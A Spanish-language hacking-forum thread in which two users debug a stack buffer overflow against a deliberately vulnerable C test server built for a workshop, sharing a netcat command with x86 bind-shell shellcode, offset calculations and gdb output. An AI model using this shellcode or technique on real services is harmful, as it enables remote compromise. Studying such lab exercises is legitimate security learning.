elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  ¿ Fallo BoF Remoto Linux ?		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: ¿ Fallo BoF Remoto Linux ?  (Leído 9,149 veces)
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
¿ Fallo BoF Remoto Linux ?
« en: 18 Febrero 2011, 01:10 am »
Bueno, después de solucionar el último problema ( y colgarlo ) me he puesto a explotar el dichoso servidor de pruebas que he hecho para el taller. Os vuelvo a remitir el código...
Código
  1. #include <sys/socket.h>
  2. #include <arpa/inet.h>
  3.  
  4. #include <stdio.h>
  5. #include <stdlib.h>
  6. #include <string.h>
  7.  
  8. #include <signal.h>
  9. #include <time.h>
  10.  
  11. int socketfd, newsocket;
  12.  
  13. int vuln (char *trampa)
  14. {
  15. 	char buffer [100];
  16. 	strcpy (buffer, trampa);
  17. }
  18.  
  19. void shutup (int signal)
  20. {
  21. 	times ();
  22. 	printf ("Shutting down...\n\n");
  23. 	close (newsocket);
  24. 	close (socketfd);
  25. 	exit (0);
  26. }
  27.  
  28. int times ()
  29. {
  30. 	time_t now=time (0);
  31. 	struct tm *ahora;
  32. 	char buffer [40];
  33. 	ahora=localtime ((const time_t*)&now);
  34. 	strftime (buffer, 40, "%d/%m/%Y %H:%M:%S" , ahora);
  35. 	printf ("%s   ", buffer);
  36. 	return 0;
  37. }
  38.  
  39. int main (int argc, char *argv [])
  40. {
  41. 	time_t now=time (0);
  42. 	struct tm *ahora;
  43. 	char hora [40];
  44. 	ahora=localtime ((const time_t*)&now);
  45. 	strftime (hora, 40, "%d/%m/%Y %H:%M:%S" , ahora);
  46. 	printf ("SmallServ 2.0 - By Sagrini - Sagrini 2010 - %s\n", hora);
  47.  
  48. 	if (getuid()!=0)
  49. 	{
  50. 		printf ("This proccess must be run by root.\n\n");
  51. 		return 1;
  52. 	}
  53. 	if (argc<2)
  54. 	{
  55. 		printf ("Use: %s <PORT>\n\n", argv [0]);
  56. 		return 1;
  57. 	}
  58. 	int cont;
  59. 	struct sockaddr_in client, host;
  60. 	char buffer [1024];
  61. 	int size=sizeof (client);
  62.  
  63. 	socketfd=socket (2, 1 ,  0);
  64. 	host.sin_family=AF_INET;
  65. 	host.sin_port=htons (atoi (argv [1]));
  66. 	host.sin_addr.s_addr=0;
  67. 	bind (socketfd, (struct sockaddr*)&host, sizeof (struct sockaddr));
  68.  
  69. 	listen (socketfd, 3);
  70.  
  71. 	times ();
  72. 	printf ("Starting up...\n\n");
  73.  
  74. 	signal (SIGTERM, shutup);
  75. 	signal (SIGINT, shutup);
  76.  
  77.  	while (1)
  78. 	{
  79. 		newsocket=accept (socketfd, (struct sockaddr*)&client, &size);
  80.  
  81. 		times ();
  82. 		printf ("Got connection from %s:%d\n", inet_ntoa (client.sin_addr), ntohs (client.sin_port));
  83.  
  84. 		cont=recv (newsocket, &buffer, 1024, 0); 
  85. 		while (cont>2)
  86. 		{
  87. 			times ();
  88. 			buffer [cont-1]='\0';
  89. 			printf ("RECV %d bytes: %s\n", cont, buffer);
  90.  
  91. 			vuln (buffer);
  92. 			cont=recv (newsocket, &buffer, 1024, 0);
  93. 		}
  94. 		times ();
  95. 		printf ("Finishing connection from %s:%d\n\n", inet_ntoa (client.sin_addr), ntohs (client.sin_port));
  96. 		close (newsocket);
  97. 	}
  98. 	close (socketfd);
  99. 	return 0;
  100. }
  101.  
  102.  

Y os remito el comando que estoy usando para explotar el fallo... [8 nops + 92 shellcode + 4 ret  + 1 null']
Código:
juanra@Juanra:~$ perl -e 'print "\x90"x8 . "\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xc4\xf7\xff\xbf" . "\x00"' | nc -vv localhost 5555555
El null lo pongo porque en la línea ...
Código
  1. 		while (cont>2)
  2. 		{
  3. 			times ();
  4. -->			buffer [cont-1]='\0';
  5. 			printf ("RECV %d bytes: %s\n", cont, buffer);
  6.  
... el último byte (se programó así por el \n de muchos clientes) se borra.


El caso es que compilo sin ninguna protección...
Código:
juanra@Juanra:~$ sudo gdb -q ./serv
[sudo] password for juanra: 
(gdb) r 31337
Starting program: /home/juanra/serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 18/02/2011 01:05:14
18/02/2011 01:05:14   Starting up...

18/02/2011 01:05:21   Got connection from 127.0.0.1:45163
18/02/2011 01:05:21   RECV 113 bytes: ��������jfX�1�CRjj��̀�jfXCRfhzifS��jQV��̀�fCCSV��̀�fCRRV��̀�jY�?̀Iy��
                          Rh//shh/bin��R��S��̀������������

Program received signal SIGSEGV, Segmentation fault.
0xbffff801 in ?? ()
(gdb) x/16x 0xbffff801
0xbffff801:	0x00000000	0x07000000	0x04000000	0x07000000
0xbffff811:	0x1c000000	0x10bffff8	0x02000000	0x00697a00
0xbffff821:	0x02000000	0x01000000	0x00000000	0xc4000000
0xbffff831:	0x00bffff7	0x5c000000	0x00bffff8	0xc4000000
(gdb) i r eip
eip            0xbffff801	0xbffff801
(gdb)
Fallo de segmentación al principio de la pila. Preguntas: ¿Por qué? ¿Cómo lo arreglo?
Llevo toda la noche pensando, pero no se me ocurre nada... Qué puede ser?

PD: Si os hace falta más información preguntadme.
Gracias! Un saludo
Sagrini
En línea


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
M3st4ng

Desconectado Desconectado

Mensajes: 58


Ver Perfil
Re: ¿ Fallo BoF Remoto Linux ?
« Respuesta #1 en: 18 Febrero 2011, 21:07 pm »
Hola!

He probado tu código con una shellcode que tenia yo y me ha funcionado:

Código:
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 18/02/2011 20:49:25
18/02/2011 20:49:25   Starting up...

18/02/2011 20:49:29   Got connection from 127.0.0.1:33672
18/02/2011 20:49:29   RECV 112 bytes: ��������������������������������������������������������^�1��F�F
                                                                                                       �
                                                                                                        ����V
                                                                                                             1ۉ�@̀�����/bin/sh�����������
process 3640 is executing new program: /bin/dash

Me da la sensación de que no llegas a sobreescribir completamente el RET. Para hacer overflow necesitas 109 bytes y tu le estas pasando 104:

Código:
$ perl -e 'print "A"x108' | nc -vv localhost 16005

SmallServ 2.0 - By Sagrini - Sagrini 2010 - 18/02/2011 20:53:00
18/02/2011 20:53:00   Starting up...

18/02/2011 20:53:16   Got connection from 127.0.0.1:54045
18/02/2011 20:53:16   RECV 108 bytes: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()

Con 108 no llego a sobreescribir pero con 109 si:

Código:
$ perl -e 'print "A"x109' | nc -vv localhost 16005

Starting program: /home/javi/programacion/pruebas/BOF_remoto/a.out 16005
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 18/02/2011 20:58:36
18/02/2011 20:58:36   Starting up...

18/02/2011 20:58:43   Got connection from 127.0.0.1:39784
18/02/2011 20:58:43   RECV 109 bytes: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Revisa el comando que lanzas contra el servidor. Ahora voy a probar tu shellcode.
En línea
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: ¿ Fallo BoF Remoto Linux ?
« Respuesta #2 en: 18 Febrero 2011, 21:29 pm »
Hola Javi!

Pues no sé, esta noche vuelvo a la carga  :-\ ... ¿Te funciona con mi comando exacto?
Sí, pero es que 100 buffer + 4 EBP + 4 ESP = 108 xD Luego hay que restarle cuatro pues al volver se restan cuatro bytes de la pila (ret). Finalmente... 104.

Eso último me extraña, no sé de dónde sale este último byte... Ahh xD del
Código
  1. buffer [cont-1]='\0';
No me había dado cuenta de que esto también me afectaba en ese ámbito... xD

Gracias! Seguiré probando...
PD: Esto es un code para ir preparando el taller, no el code que vamos a usar en el taller. Nadie es taaaan despistado jaja...
En línea


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
M3st4ng

Desconectado Desconectado

Mensajes: 58


Ver Perfil
Re: ¿ Fallo BoF Remoto Linux ?
« Respuesta #3 en: 18 Febrero 2011, 21:40 pm »
Hola de nuevo!

He probado tu shellcode aparte, sin usar ningún tipo de código vulnerable, y me da "violacion de segmento". ¿Puede que esté la shellcode mal? Intentaré buscar una que haga un bindshell y probaré a ver.

Saludos
En línea
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: ¿ Fallo BoF Remoto Linux ?
« Respuesta #4 en: 18 Febrero 2011, 21:42 pm »
Cita de: M3st4ng en 18 Febrero 2011, 21:40 pm
Hola de nuevo!

He probado tu shellcode aparte, sin usar ningún tipo de código vulnerable, y me da "violacion de segmento". ¿Puede que esté la shellcode mal? Intentaré buscar una que haga un bindshell y probaré a ver.

Mmm, puede que la haya recortado mal, luego la miro, pero no es mía :P
_________________________________________________________________________
Vale, modifico, un detallito...

Al activar el randomize_va_space...
Código:
juanra@Juanra:~$ sudo gdb -q serv
[sudo] password for juanra: 
(gdb) r 31337
Starting program: /home/juanra/serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 19/02/2011 13:09:38
19/02/2011 13:09:38   Starting up...

19/02/2011 13:09:41   Got connection from 127.0.0.1:46633
19/02/2011 13:09:41   RECV 113 bytes: ��������jfX�1�CRjj��̀�jfXCRfhzifS��jQV��̀�fCCSV��̀�fCRRV��̀�jY�?̀Iy��
                           Rh//shh/bin��R��S��̀������������

Program received signal SIGSEGV, Segmentation fault.
0xbffff7c4 in ?? ()
(gdb)
RET correcto.

Y al desactivar...
Código:
(gdb) r 31337
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/juanra/serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 19/02/2011 13:10:53
19/02/2011 13:10:53   Starting up...

19/02/2011 13:10:56   Got connection from 127.0.0.1:60248
19/02/2011 13:10:56   RECV 113 bytes: ��������jfX�1�CRjj��̀�jfXCRfhzifS��jQV��̀�fCCSV��̀�fCRRV��̀�jY�?̀Iy��
                           Rh//shh/bin��R��S��̀������������

Program received signal SIGSEGV, Segmentation fault.
0xbffff801 in ?? ()
(gdb)

Ambos corren así:
Código:
juanra@Juanra:~$ perl -e 'print "\x90"x8 . "\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xc4\xf7\xff\xbf"x3 . "\x00"' | nc -vv localhost 31337

¿? Voy a mirar a ver la shellcode...
_________________________________________________________________________
Modf: La shellcode va perfectamente :P
« Última modificación: 19 Febrero 2011, 13:16 pm por Sagrini » En línea


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
M3st4ng

Desconectado Desconectado

Mensajes: 58


Ver Perfil
Re: ¿ Fallo BoF Remoto Linux ?
« Respuesta #5 en: 20 Febrero 2011, 21:47 pm »
Hola!

He estado todo el finde fuera y no me ha dado tiempo a mirar mucho. Lo que sí he hecho es reproducir el problema que tú tienes, parece que la shellcode se jode  por algún motivo que aún no he descubierto.
A priori todo el copiado del buffer lo hace bien:

Código:

0xbffff180:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff190:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff1a0:	0x90909090	0x90909090	0x9958666a	0x5243db31
0xbffff1b0:	0x026a016a	0x80cde189	0x58666a96	0x68665243
0xbffff1c0:	0x5366697a	0x106ae189	0xe1895651	0x66b080cd
0xbffff1d0:	0x56534343	0x80cde189	0x524366b0	0xe1895652
0xbffff1e0:	0x6a9380cd	0x3fb05902	0x794980cd	0x520bb0f9
0xbffff1f0:	0x732f2f68	0x622f6868	0xe3896e69	0x53e28952
0xbffff200:	0x80cde189	0xbffff678	0xbffff1a0

Luego da un execepción y veo que la pila se ha modificado justo donde tengo la shellcode:

Código:
0xbffff180:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff190:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffff1a0:	0x90909090	0x90909090	0x9958666a	0x5243db31
0xbffff1b0:	0x026a016a	0x80cde189	0x58666a96	0x68665243
0xbffff1c0:	0x5366697a	0x106ae189	0xe1895651	0x66b080cd
0xbffff1d0:	0x56534343	0x80cde189	0x524366b0	0x00000000
0xbffff1e0:	0x00000000	0x00000007	0x00000004	0x00000007
0xbffff1f0:	0xbffff1f8	0x00000010	0x697a0002	0x00000000
0xbffff200:	0x00000002	0x00000001	0x00000000	0xbffff200

Como se puede ver el EIP esta intentando ejecutar la instrucción que esta en la dir 0xbffff1dd. En esa dir habia código de nuestra shellcode que ha sido modificada.

Código:
Program received signal SIGSEGV, Segmentation fault.
0xbffff1dd in ?? ()
(gdb) info r
eax            0x66	102
ecx            0xbffff1e4	-1073745436
edx            0x0	0
ebx            0x5	5
esp            0xbffff1dc	0xbffff1dc
ebp            0xbffff678	0xbffff678
esi            0x7	7
edi            0x0	0
eip            0xbffff1dd	0xbffff1dd
eflags         0x10206	[ PF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

Seguirí investigando
« Última modificación: 20 Febrero 2011, 21:49 pm por M3st4ng » En línea
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: ¿ Fallo BoF Remoto Linux ?
« Respuesta #6 en: 21 Febrero 2011, 15:01 pm »
El fallo creo que podría estar en la shellcode... Aunque no me sirva para este caso le voy a meter una local, a ver si se ejecuta xD
Si funciona es que el fallo está en la shellcode y listo...

Iré modificando xD
En línea


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: ¿ Fallo BoF Remoto Linux ?
« Respuesta #7 en: 21 Febrero 2011, 19:39 pm »
Perdonad el doble-post, pero... Lo conseguí!
En realidad era una tontería... \x00 se considera como byte nulo para strlen, por lo que no se contaba y me modificaba de todos modos una parte del exploit. Todo se solucionaba cambiando el byte nulo por cualquier otra cosa... xD xD xD

xD Ohh... Un detallito era que en el GDB me funciona, pero fuera no. Eso es que el ret me cambia al salir :P Ahora voy a meterle la buena shellcode y listo xD
En línea


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
M3st4ng

Desconectado Desconectado

Mensajes: 58


Ver Perfil
Re: ¿ Fallo BoF Remoto Linux ?
« Respuesta #8 en: 21 Febrero 2011, 22:37 pm »
Hola!

Pues a mi me sigue cascando. La shellcode que uso esta bien porque la he probado en local y funciona perfectamente. No entiendo por qué narices se me modifica la shellcode.....
En línea
Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: ¿ Fallo BoF Remoto Linux ?
« Respuesta #9 en: 21 Febrero 2011, 22:43 pm »
A mi lo que me falla es mi shellcode. He hecho una que printa AAAA y funciona, ahora, la del remoto no va... Ahora voy a mirar el desensamblado a ver a qué amiguito llama :P
En línea


* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Importante fallo en el kernel posibilita la escalada local en sistemas Linux
Noticias 		DarkDelphi 4 2,442 Último mensaje 21 Septiembre 2010, 23:45 pm
por Foxy Rider
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines